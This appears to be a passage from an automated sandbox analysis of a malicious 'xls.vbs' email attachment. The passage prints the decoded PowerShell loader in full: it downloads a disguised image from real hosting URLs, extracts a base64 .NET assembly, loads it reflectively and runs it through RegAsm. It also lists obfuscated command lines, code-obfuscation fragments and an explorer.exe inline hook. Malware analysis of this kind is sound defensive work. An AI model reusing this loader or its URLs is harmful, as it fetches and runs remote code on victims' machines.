QBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@H
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.mApAgbe/moc.swanozama.1-tsae-su.3s.52akel//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@H Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.mApAgbe/moc.swanozama.1-tsae-su.3s.52akel//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00416823 push cs; ret 6_2_00416829
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041D4D2 push eax; ret 6_2_0041D4D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041D4DB push eax; ret 6_2_0041D542
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041D485 push eax; ret 6_2_0041D4D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041D53C push eax; ret 6_2_0041D542
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C09AD push ecx; mov dword ptr [esp], ecx 6_2_030C09B6
Source: C:\Windows\explorer.exe Code function: 7_2_0BC0BB02 push esp; retn 0000h 7_2_0BC0BB03
Source: C:\Windows\explorer.exe Code function: 7_2_0BC0BB1E push esp; retn 0000h 7_2_0BC0BB1F
Source: C:\Windows\explorer.exe Code function: 7_2_0BC0B9B5 push esp; retn 0000h 7_2_0BC0BAE7
Source: C:\Windows\explorer.exe Code function: 7_2_0F263B02 push esp; retn 0000h 7_2_0F263B03
Source: C:\Windows\explorer.exe Code function: 7_2_0F263B1E push esp; retn 0000h 7_2_0F263B1F
Source: C:\Windows\explorer.exe Code function: 7_2_0F2639B5 push esp; retn 0000h 7_2_0F263AE7
Source: C:\Windows\explorer.exe Code function: 7_2_0F3E6B1E push esp; retn 0000h 7_2_0F3E6B1F
Source: C:\Windows\explorer.exe Code function: 7_2_0F3E6B02 push esp; retn 0000h 7_2_0F3E6B03
Source: C:\Windows\explorer.exe Code function: 7_2_0F3E69B5 push esp; retn 0000h 7_2_0F3E6AE7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00E39C4D push ecx; ret 8_2_00E39C60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034D09AD push ecx; mov dword ptr [esp], ecx 8_2_034D09B6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B16823 push cs; ret 8_2_00B16829
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1D485 push eax; ret 8_2_00B1D4D8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1D4D2 push eax; ret 8_2_00B1D4D8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1D4DB push eax; ret 8_2_00B1D542
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1D53C push eax; ret 8_2_00B1D542
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0324EB02 push esp; retn 0000h 8_2_0324EB03
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0324EB1E push esp; retn 0000h 8_2_0324EB1F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0324E9B5 push esp; retn 0000h 8_2_0324EAE7

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x88 0x8E 0xEC
Uses an obfuscated file name to hide its real file extension (double extension)
Source: Possible double extension: xls.vbs Static PE information: RFQ Order PT502818.xls.vbs
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
